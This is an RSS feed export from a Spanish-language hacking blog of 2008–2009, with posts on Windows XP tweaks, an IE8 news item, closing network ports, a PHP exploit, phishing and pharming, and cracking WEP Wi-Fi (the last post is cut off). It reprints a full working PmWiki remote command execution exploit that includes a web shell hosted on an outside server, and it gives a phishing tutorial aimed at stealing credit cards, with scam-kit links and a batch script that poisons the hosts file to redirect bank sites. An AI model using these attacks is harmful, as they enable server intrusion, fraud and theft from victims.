<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BlogDelHacker</title>
	<atom:link href="http://www.blogdelhacker.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blogdelhacker.com</link>
	<description>Blog sobre seguridad, redes, vulnerabilidades, hacking linux y windows...</description>
	<pubDate>Sun, 25 Jan 2009 19:18:50 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Trucos de windows XP</title>
		<link>http://www.blogdelhacker.com/2009/01/25/trucos-de-windows-xp/</link>
		<comments>http://www.blogdelhacker.com/2009/01/25/trucos-de-windows-xp/#comments</comments>
		<pubDate>Sun, 25 Jan 2009 19:18:50 +0000</pubDate>
		<dc:creator>rush</dc:creator>
		
		<category><![CDATA[Comenzando]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=106</guid>
		<description><![CDATA[Bueno muchas veces no sabemos usar nuestro sistema operativo al 100% y aveces queremos moldear windows como si fuera linux y pues aqui les dejo dos trucos bastante interesantes y los que pienso son utiles.
Hay muchos mas pero esos despues los pondre.
Acelerar el menu de inicio.
Para acelerar el menu de inicio cuando encendemos la pc [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno muchas veces no sabemos usar nuestro sistema operativo al 100% y aveces queremos moldear windows como si fuera linux y pues aqui les dejo dos trucos bastante interesantes y los que pienso son utiles.</p>
<p>Hay muchos mas pero esos despues los pondre.</p>
<p><code>Acelerar el menu de inicio.</p>
<p>Para acelerar el menu de inicio cuando encendemos la pc tendremos que hacer lo siguiente.</p>
<p>Nos vamos a Inicio>Ejecutar>regedit</p>
<p>y damos click en aceptar aora desplegamos.</p>
<p>HKEY_CURRENT_USER>Control Panel>Desktop>MenuShowDelay</p>
<p>si no lo encuentran simplemente vallan a Edicion>Buscar  (en el regedit)<br />
y ponen MenuShowDelay</p>
<p>y cuando lo ayamos encontrado damos doble click que por defecto tendra un valor de (400)</p>
<p>Pondremos un valor de cero para conseguir la mayor velocidad</code></p>
<p><code>Liberar memoria RAM. Despues de aver ejecutado aplicaciones multiples, que hagan uso intensivo de los recuersos del sistema habremos detectado que windows queda mucho mas lento. La razon es que las aplicaciones bloquean parte de la RAM que han utilizado, asi ocacionando la fragmentacion de memoria.</p>
<p>Para poder desbloquear esta parte de la RAM utilizaremos el siguiente script:</p>
<p>Abrimos el block de notas de windows (NOTEPAD) y dependiendo de la memoria RAM de nuestra pc escribimos...</p>
<p>Si tienes menos de 128MB de memoria RAM, escribes : Mystring=(16000000)</p>
<p>Si tienes 128MB de memoria RAM, escribes : Mystring=(80000000)</p>
<p>Ahora vamos a guardar nuestro archivo, Nos vamos a Archivo>Guardar como><br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2009/01/25/trucos-de-windows-xp/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Internet Explorer 8 será instalado automáticamente</title>
		<link>http://www.blogdelhacker.com/2009/01/13/internet-explorer-8-sera-instalado-automaticamente/</link>
		<comments>http://www.blogdelhacker.com/2009/01/13/internet-explorer-8-sera-instalado-automaticamente/#comments</comments>
		<pubDate>Tue, 13 Jan 2009 04:36:01 +0000</pubDate>
		<dc:creator>rush</dc:creator>
		
		<category><![CDATA[General]]></category>

		<category><![CDATA[Noticias]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=105</guid>
		<description><![CDATA[Microsoft ha optado por llevar Internet Explorer 8 a sus clientes mediante una actualización automática. Los usuarios no interesados pueden, no obstante, prescindir del programa. Cuando Internet Explorer 7 fue lanzado usando un procedimiento similar, Microsoft recibió críticas de Google por haber supuestamente abusado de su posición líder en el mercado de los sistemas operativos [...]]]></description>
			<content:encoded><![CDATA[<p><img style="vertical-align: baseline;" src="http://walhez.com/wp-content/uploads/2007/11/iexplorer1fd.gif" alt="" width="300" height="300" />Microsoft ha optado por llevar Internet Explorer 8 a sus clientes mediante una actualización automática. Los usuarios no interesados pueden, no obstante, prescindir del programa. Cuando Internet Explorer 7 fue lanzado usando un procedimiento similar, Microsoft recibió críticas de Google por haber supuestamente abusado de su posición líder en el mercado de los sistemas operativos al forzar a sus clientes a instalar el navegador. En esta oportunidad, Microsoft precisa que los usuarios no interesados podrán evitar la instalación del producto.</p>
<p>Asta aora no hay una fecha para el lanzamiento de Internet Explorer 8</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2009/01/13/internet-explorer-8-sera-instalado-automaticamente/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Explotando Exploit PHP</title>
		<link>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/</link>
		<comments>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/#comments</comments>
		<pubDate>Fri, 02 Jan 2009 20:12:45 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=102</guid>
		<description><![CDATA[Antes que nada nesecitamos saber/tener un par de cosas:
*Los exploits php se distinguen de esta manera  #!/usr/bin/php
*Nesecitamos un compilador (BamCompile)
Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://

Posteriormente usamos un exploit yo usare de ejemplo este:

#!/usr/bin/php -q -d short_open_tag=on
&#60;?
print_r(&#8217;
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
PmWiki &#60;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit
by [...]]]></description>
			<content:encoded><![CDATA[<p>Antes que nada nesecitamos saber/tener un par de cosas:</p>
<p>*Los exploits php se distinguen de esta manera  #!/usr/bin/php</p>
<p>*Nesecitamos un compilador <a href="http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip">(BamCompile)</a></p>
<p>Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://</p>
<p><a href="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11.jpg"><img class="alignnone size-medium wp-image-103" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11-300x150.jpg" alt="" width="300" height="150" /></a></p>
<p>Posteriormente usamos un exploit yo usare de ejemplo este:</p>
<p><span id="more-102"></span></p>
<blockquote><p>#!/usr/bin/php -q -d short_open_tag=on<br />
&lt;?<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
PmWiki &lt;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit<br />
by rgod rgod @autistici.org<br />
site: <a href="http://retrogod.altervista.org/" target="_blank">http://retrogod.altervista.org</a><br />
dork: inurl:pmwiki.php +&#8221;Page last modified on&#8221; | PmWikiPhilosophy<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
/*<br />
works with register_globals=On<br />
against PHP &lt; 4.4.3, 5 &lt;= PHP &lt; 5.1.4<br />
*/<br />
if ($argc&lt;5) {<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Usage: php &#8216;.$argv[0].&#8217; host path http_loc cmd OPTIONS<br />
host:      target server (ip/hostname)<br />
path:      path to pmwiki<br />
http_loc:  an http site with the code to include (without ending slash)<br />
cmd:       a shell command<br />
Options:<br />
-p[port]:    specify a port other than 80<br />
-P[ip:port]: specify a proxy<br />
Example:<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -P1.1.1.1:80<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -p81</p>
<p>Note:<br />
prepare this code in <a href="http://somehost.com/scripts/stdconfig.php/index.html" target="_blank">http://somehost.com/scripts/stdconfig.php/index.html</a> :<br />
&lt;?php<br />
error_reporting(0);set_time_limit(0);echo &#8220;my_delim&#8221;;<br />
passthru($_SERVER[&#8221;HTTP_CLIENT_IP&#8221;]);die;<br />
?&gt;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
die;<br />
}</p>
<p>error_reporting(0);<br />
ini_set(&#8221;max_execution_time&#8221;,0);<br />
ini_set(&#8221;default_socket_timeout&#8221;,5);</p>
<p>function quick_dump($string)<br />
{<br />
$result=&#8221;;$exa=&#8221;;$cont=0;<br />
for ($i=0; $i&lt;=strlen($string)-1; $i++)<br />
{<br />
if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))<br />
{$result.=&#8221;  .&#8221;;}<br />
else<br />
{$result.=&#8221;  &#8220;.$string[$i];}<br />
if (strlen(dechex(ord($string[$i])))==2)<br />
{$exa.=&#8221; &#8220;.dechex(ord($string[$i]));}<br />
else<br />
{$exa.=&#8221; 0&#8243;.dechex(ord($string[$i]));}<br />
$cont++;if ($cont==15) {$cont=0; $result.=&#8221;\r\n&#8221;; $exa.=&#8221;\r\n&#8221;;}<br />
}<br />
return $exa.&#8221;\r\n&#8221;.$result;<br />
}<br />
$proxy_regex = &#8216;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#8217;;<br />
function sendpacketii($packet)<br />
{<br />
global $proxy, $host, $port, $html, $proxy_regex;<br />
if ($proxy==&#8221;) {<br />
$ock=fsockopen(gethostbyname($host),$port);<br />
if (!$ock) {<br />
echo &#8216;No response from &#8216;.$host.&#8217;:&#8217;.$port; die;<br />
}<br />
}<br />
else {<br />
$c = preg_match($proxy_regex,$proxy);<br />
if (!$c) {<br />
echo &#8216;Not a valid proxy&#8230;&#8217;;die;<br />
}<br />
$parts=explode(&#8217;:',$proxy);<br />
echo &#8220;Connecting to &#8220;.$parts[0].&#8221;:&#8221;.$parts[1].&#8221; proxy&#8230;\r\n&#8221;;<br />
$ock=fsockopen($parts[0],$parts[1]);<br />
if (!$ock) {<br />
echo &#8216;No response from proxy&#8230;&#8217;;die;<br />
}<br />
}<br />
fputs($ock,$packet);<br />
if ($proxy==&#8221;) {<br />
$html=&#8221;;<br />
while (!feof($ock)) {<br />
$html.=fgets($ock);<br />
}<br />
}<br />
else {<br />
$html=&#8221;;<br />
while ((!feof($ock)) or (!eregi(chr(0&#215;0d).chr(0&#215;0a).chr(0&#215;0d).chr(0&#215;0a),$html))) {<br />
$html.=fread($ock,1);<br />
}<br />
}<br />
fclose($ock);<br />
#debug<br />
#echo &#8220;\r\n&#8221;.$html;<br />
}</p>
<p>$host=$argv[1];<br />
$path=$argv[2];<br />
$http_loc=$argv[3];<br />
$cmd=&#8221;";<br />
$port=80;<br />
$proxy=&#8221;";</p>
<p>for ($i=4; $i&lt;$argc; $i++){<br />
$temp=$argv[$i][0].$argv[$i][1];<br />
if (($temp&lt;&gt;&#8221;-p&#8221;) and ($temp&lt;&gt;&#8221;-P&#8221;)) {$cmd.=&#8221; &#8220;.$argv[$i];}<br />
if ($temp==&#8221;-p&#8221;)<br />
{<br />
$port=str_replace(&#8221;-p&#8221;,&#8221;",$argv[$i]);<br />
}<br />
if ($temp==&#8221;-P&#8221;)<br />
{<br />
$proxy=str_replace(&#8221;-P&#8221;,&#8221;",$argv[$i]);<br />
}<br />
}<br />
if (($path[0]&lt;&gt;&#8217;/') or ($path[strlen($path)-1]&lt;&gt;&#8217;/')) {echo &#8216;Error&#8230; check the path!&#8217;; die;}<br />
if ($proxy==&#8221;) {$p=$path;} else {$p=&#8217;http://&#8217;.$host.&#8217;:&#8217;.$port.$path;}</p>
<p>$data =&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;FarmD\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;$http_loc\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1778478215\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1304181425\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a&#8211;\r\n&#8221;;<br />
$packet =&#8221;POST &#8220;.$p.&#8221;pmwiki.php?n=PmWiki.BasicEditing?action=edit HTTP/1.0\r\n&#8221;;<br />
$packet.=&#8221;CLIENT-IP: &#8220;.$cmd.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Content-Type: multipart/form-data; boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;7d529a1d23092a\r\n&#8221;;<br />
$packet.=&#8221;Content-Length: &#8220;.strlen($data).&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Host: &#8220;.$host.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Connection: Close\r\n\r\n&#8221;;<br />
$packet.=$data;<br />
sendpacketii($packet);<br />
if (strstr($html,&#8221;my_delim&#8221;)){<br />
echo &#8220;exploit succeeded&#8230;\n&#8221;;$temp=explode(&#8221;my_delim&#8221;,$html);die($temp[1]);<br />
}<br />
elseif (strstr($html,&#8221;failed to open stream&#8221;))<br />
{echo &#8220;*** adjust path&#8230; ***\n&#8221;;die($html);}<br />
else<br />
{echo &#8220;exploit failed&#8230;&#8221;;}<br />
?&gt;</p></blockquote>
<p>El codigo que les acabo de dejar lo copiamos en el bloc de notas y lo guardamos con una extension .php</p>
<p>Ahora lo compilamos: tenemos que teclear:</p>
<p>bamcompile exploit.php exploit.exe</p>
<p>siendo exploit.php el codigo que les acabo de dejar,</p>
<p><img class="alignnone" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen2.jpg" alt="" /></p>
<p>Ahora nos damos cuenta que se ha creado un archivo llamado exploit.exe que se encuentra en la bamcompile1.21</p>
<p>Le damos doble click al archivo exploit.exe y listo ahi vienen las instrucciones de como usarlo</p>
<p>SaLuDoS</p>
<p>St4t1k</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Explicion de puertos y como cerrarlos</title>
		<link>http://www.blogdelhacker.com/2008/10/02/explicion-de-puertos-y-como-cerrarlos/</link>
		<comments>http://www.blogdelhacker.com/2008/10/02/explicion-de-puertos-y-como-cerrarlos/#comments</comments>
		<pubDate>Thu, 02 Oct 2008 20:00:40 +0000</pubDate>
		<dc:creator>shabac</dc:creator>
		
		<category><![CDATA[Escaneo de máquinas y redes]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=99</guid>
		<description><![CDATA[Nota: Un puerto abierto no es necesariamente peligroso!
Estas en riesgo solo si el programa que usa el puerto tiene códigos dañinos. Así que no hay una razón para cerrar todos los puertos en tu sistema. En realidad, sin tener puertos abiertos, simplemente no funcionaría internet!
Un puerto abierto no es un objeto autónomo, y no debería [...]]]></description>
			<content:encoded><![CDATA[<p class="TXTC">Nota: Un puerto abierto no es necesariamente peligroso!<br />
Estas en riesgo solo si el programa que usa el puerto tiene códigos dañinos. Así que no hay una razón para cerrar todos los puertos en tu sistema. En realidad, sin tener puertos abiertos, simplemente no funcionaría internet!</p>
<p class="TXTC">Un puerto abierto no es un objeto autónomo, y no debería ser considerado como algo que puede ser destruido al cerrarlo. Si un puerto está abierto en tu ordenador, significa que hay un programa activo usando dicho número de puerto para comunicarse con otros ordenadores en la web. Un puerto no es abierto por el sistema operativo, es abierto por un programa específico queriendo usarlo.</p>
<p class="TXTC">Para cerrar un puerto, usualmente solo es necesario cerrar el programa ó servicio que mantiene dicho puerto abierto. En algunos puertos basta con decirle a un programa o servicio que el puerto no debe estar abierto. Un buen ejemplo son los Servicios de Información de Internet de Microsoft, en Windows 2000 y Windows XP. Si son instalados, abren tres puertos automáticamente: 21, 25 y 80. El puerto 21 es el servidor FTP; el puerto 25 el servidor SMTP (servidor de email); y el puerto 80 el servidor web para HTTP.</p>
<p class="TXTC">El servidor FTP habilita a otros usuarios de internet a descargar archivos compartidos desde tu sistema. Pueden también subir archivos a tu sistema, si eliges permitirlo. El servidor SMTP es usado para enviar emails directamente a la casilla de correo del recipiente sin usar un servidor de correo externo. El servidor de correo te permite correr un sitio web en tu PC. Pero esto es solo alcanzable en tu dirección de IP. Si deseas hacer esto accesible al público, necesitas un nombre de dominio que redireccione a una dirección de IP estática.</p>
<p class="TXTC">Sin embargo, si no necesitas todos estos servidores, simplemente ciérralos y los puertos serán cerrados automáticamente. Abre el administrador de servicios en el panel de control - administrador de tareas. Servicios y programas que son abiertos automáticamente cuando se inicia el sistema sin ninguna ventana visible. Estos trabajan tras bambalinas (en el fondo).</p>
<p class="TXTC">Busca &#8220;servicio de publicación WWW&#8221; en la lista y haz click en el icono Detener Servicio en la parte superior. El puerto 80 no estará más en uso, estará cerrado. Puedes hacer lo mismo con el &#8220;servicio de publicación FTP&#8221; y el &#8220;protocolo simple de transporte de Correo (SMTP)&#8221;.</p>
<p class="TXTC">Sin embargo, no es siempre sencillo el averiguar porque un puerto está abierto. Un ejemplo es el puerto 5000 el cual es abierto de forma predeterminada por Windows ME y XP. Para esto, no hay servicio que puedas apagar, que cierre el puerto. Para cerrar este puerto, es necesario desinstalar cierto componente del sistema. El puerto 5000 es usado para &#8220;plug and play&#8221; con dispositivos de redes. Si cierras este puerto, la red &#8220;plug and play&#8221; (conecta y juega) no estará más disponible.<br />
Cortafuegos (Firewalls)</p>
<p class="TXTC">Aunque un puerto no pueda ser bloqueado cerrando un programa ó servicio, hay otras opciones para bloquear las comunicaciones a dicho puerto. Los Cortafuegos (firewalls) pueden prevenir conexiones en puertos específicos. Trabajan según el principio en que los paquetes de datos que usan un puerto en particular en una red son filtrados. Sin embargo, los cortafuegos solo proveen protección pasiva. Esto significa que tu puedes tener un troyano instalado en tu ordenador, pero no se puede conectar al atacante a causa del cortafuegos el cual está bloqueando la conexión.</p>
<p class="TXTC">Hay diferentes conceptos de cortafuegos. Por un lado hay Cortafuegos de Escritorio como Zonealarm ó Tiny Personal Firewall, los cuales son instalados de forma local en la PC que protegen. Estos cortafuegos se localizan sobre la capa del driver de la red del sistema operativo, y previenen conexiones desde ó hacia puertos específicos bloqueados. Pero aquí también hay un obstáculo. No se puede prevenir que programas ó troyanos, los cuales no usan el driver de la red del sistema operativo, hagan una conexión hacia afuera del ordenador. Si un atacante puede instalar un troyano con su propio driver de red en tu PC, un cortafuegos de escritorio no es de gran ayuda.</p>
<p class="TXTC">Una técnica más segura es instalar un cortafuegos en un segundo ordenador. Usualmente en una red entera de ordenadores solo se pueden enviar datos hacia internet a través de un &#8220;servidor cortafuegos&#8221;. Los ordenadores en la red no tienen una conexión directa a internet. Todos los datos son transmitidos por el cortafuegos, y pueden entonces ser bloqueados cuando sea necesario. La mayoría de estos cortafuegos también son capaces de analizar paquetes de datos. Entonces, por ejemplo, si un email inofensivo es transferido, el cortafuegos puede chequear que ahí no hay un virus adjuntos al email, y filtra el adjunto antes de enviarlo al PC destino. En general, los buenos cortafuegos tienden a ser bastante caros y usualmente requieren hardware especial.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/10/02/explicion-de-puertos-y-como-cerrarlos/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Phising y Pharming</title>
		<link>http://www.blogdelhacker.com/2008/03/08/97/</link>
		<comments>http://www.blogdelhacker.com/2008/03/08/97/#comments</comments>
		<pubDate>Sat, 08 Mar 2008 22:42:42 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando Windows]]></category>

		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/03/08/97/</guid>
		<description><![CDATA[Bien pues se escribio un tutorial asi que ya masomenos saben que es.
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;
Material:
Scam
Hacked Host
Mail list
Mailer Inbox
Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html
Lo descomprimimos, lo submos a algun hacked host [...]]]></description>
			<content:encoded><![CDATA[<p>Bien pues se escribio un tutorial asi que ya masomenos saben que es.<br />
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;</p>
<p>Material:<br />
Scam<br />
Hacked Host<br />
Mail list<br />
Mailer Inbox</p>
<p>Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal<br />
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html</p>
<p>Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y  nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como<br />
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen<br />
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..<span id="more-97"></span></p>
<p>Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno<br />
http://rapidshare.com/files/76390702/mailerpriv8.php</p>
<p>Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam<br />
(que es lo que se escribe para engañar a la victima)<br />
y si tenemos una letter para pharming nos dedicamos a crear uno <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)</p>
<p>Ejemplo en batch<br />
<code><br />
@echo off<br />
echo ipdetuhost  www.banamex.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bbva.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bancomer.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.esmas.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.hotmail.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
exit</code></p>
<p>Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador  sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Solo es teoria en general pero poco a poco AHhahAH</p>
<p>&#8211;StATiK&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/03/08/97/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Como Hackear una red wifi.</title>
		<link>http://www.blogdelhacker.com/2008/02/25/como-hackear-una-red-wifi/</link>
		<comments>http://www.blogdelhacker.com/2008/02/25/como-hackear-una-red-wifi/#comments</comments>
		<pubDate>Mon, 25 Feb 2008 01:19:49 +0000</pubDate>
		<dc:creator>frAnz.</dc:creator>
		
		<category><![CDATA[Hacking en Wireless]]></category>

		<category><![CDATA[Trabajando en Linux]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/02/25/como-hackear-una-red-wifi/</guid>
		<description><![CDATA[Este es un tema muy hablado ultimamente, parece que muchos tienen dudas respecto a este tema a si que voy a tratar de explicarme adecuadamente, anriormente hable aqui sobre wifislax y ahora en este tema me basare en en hackear una red usando esta distribucion.
lo que tratare de explicar es, como obtener las claves de [...]]]></description>
			<content:encoded><![CDATA[<p>Este es un tema muy hablado ultimamente, parece que muchos tienen dudas respecto a este tema a si que voy a tratar de explicarme adecuadamente, anriormente hable aqui sobre <a href="http://www.blogdelhacker.com/2007/02/16/hablemos-de-wifislax/">wifislax </a>y ahora en este tema me basare en en hackear una red usando esta distribucion.</p>
<p>lo que tratare de explicar es, como obtener las claves de redes inalambricas, para este caso me basare en romper una clave de encriptacion wep a 64 bits, recomoiendo que lean un poco sobre tipo de encriptaciones de redes wifi para saber mejor cuando van a atacar una red de este tipo.</p>
<p>Nota: En las imagenes se puede apreciar que las edite para no mostrar las direcciones Mac y a si evitarme problemas <img src="http://foros.hackerss.com/style_emoticons/default/wink.gif" alt="wink.gif" border="0" /><br />
Vamos a ver como podemos obtener claves de redes inalambricas, para este ejemplo me basare en hackear mi propia red.</p>
<blockquote><p>Material usado:<br />
cd wifislax 2.0<br />
tarjeta inalambrica: Ather0s<br />
tamaño de memoria raam: 256</p></blockquote>
<p>Bien, lo primero que tenemos que hacer una ves ya estado en nuestra live cd es poner nuestra tareta en modo monitor, para eso vamos a:<span id="more-96"></span></p>
<p><!--coloro:#FF0000--><!--/coloro-->Menu<!--colorc--><!--/colorc-->&gt;<!--coloro:#FF0000--><!--/coloro-->Wifislax<!--colorc--><!--/colorc-->&gt;<!--coloro:#FF0000--><!--/coloro-->Asistencia Chipse<!--colorc--><!--/colorc-->&gt;<!--coloro:#FF0000--><!--/coloro-->Asistencia Chipset Ather0s<!--colorc--><!--/colorc-->&gt; <!--coloro:#FF0000--><!--/coloro-->Crear interface (Modo Monitor)<br />
<!--colorc--><!--/colorc--><br />
Bien, ahora lo siguiente es ejecutar Kismet para poder ver por que canal viaa la red victima, la Mac y el tipo de encriptacion.</p>
<p><!--coloro:#8B0000--><!--/coloro-->Menu<!--colorc--><!--/colorc-->&gt;<!--coloro:#8B0000--><!--/coloro-->Wifislax<!--colorc--><!--/colorc-->&gt;<!--coloro:#8B0000--><!--/coloro-->Herramientas Wireless<!--colorc--><!--/colorc-->&gt;<!--coloro:#8B0000--><!--/coloro-->Monitorizacion wireless (Kismet)<!--colorc--><!--/colorc--></p>
<p>en driver selecciono rt2500 y le doy aplicar.</p>
<p>cuando inicie la pantalla de kismet tecleamos la tecla de &lt;space&gt; y despues tecleamos la teltra “s” 2 veces</p>
<p><a href="http://img235.imageshack.us/my.php?image=kismetmo0.png"><img src="http://img235.imageshack.us/img235/6880/kismetmo0.th.png" border="0" /></a><br />
tecleamos enter sobre la red vicitima:</p>
<p>y anotamos los datos que nos interesan:</p>
<p><strong>ssd, bssid, chanel y Encrypt</strong>:</p>
<p><a href="http://img235.imageshack.us/my.php?image=kismet2mv2.png"><img src="http://img235.imageshack.us/img235/8907/kismet2mv2.th.png" border="0" /></a><br />
podemos observar en la imagen que la ssid (Nombre de la red) es Th3r0rn, la bssid es la MAC, Tambien podemos ver que el canal por el que viaja la red es el 6 y tambien que el tipo de encriptacion es WEP.</p>
<p>Una ves que tenemos esos datos ya anotados, salimos presionando la tecla ” Q” despues sobre la misma red victima tecleamos la letra “C” esto para ver las maquinas conectadas a la red mediante wireless claro <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a href="http://img251.imageshack.us/my.php?image=kismet3dy2.png"><img src="http://img251.imageshack.us/img251/556/kismet3dy2.th.png" border="0" /></a><br />
Bien ahora cerramos la ventana de Kismet y ejecutamos una nueva shell, ya que tenemos nuestra shell lo siguiente sera ejecutar airodump, para ello lo ejecutaremos a si:</p>
<p><!--c1--></p>
<p><!--ec1-->airodump ath0 th3r0rn 6</p>
<p><!--ec2--></p>
<p>explico la sintaxis: donde <strong>airodump </strong>hacemos la llamada al programa, donde <strong>ath0</strong> es nuestra interfaz wireless, donde <strong>th3r0rn</strong> es el nombre del archivo que se genrara en formato .cap o .ivs el nombre puedes poner el que quieras, y en donde<strong> 6 </strong>es el canal por el cual airodump va a capturar el trafico filtrando todos los demás canales ya que como vimos antes en la pantalla del kisme, nuestra red victima viaja por el canal 6.</p>
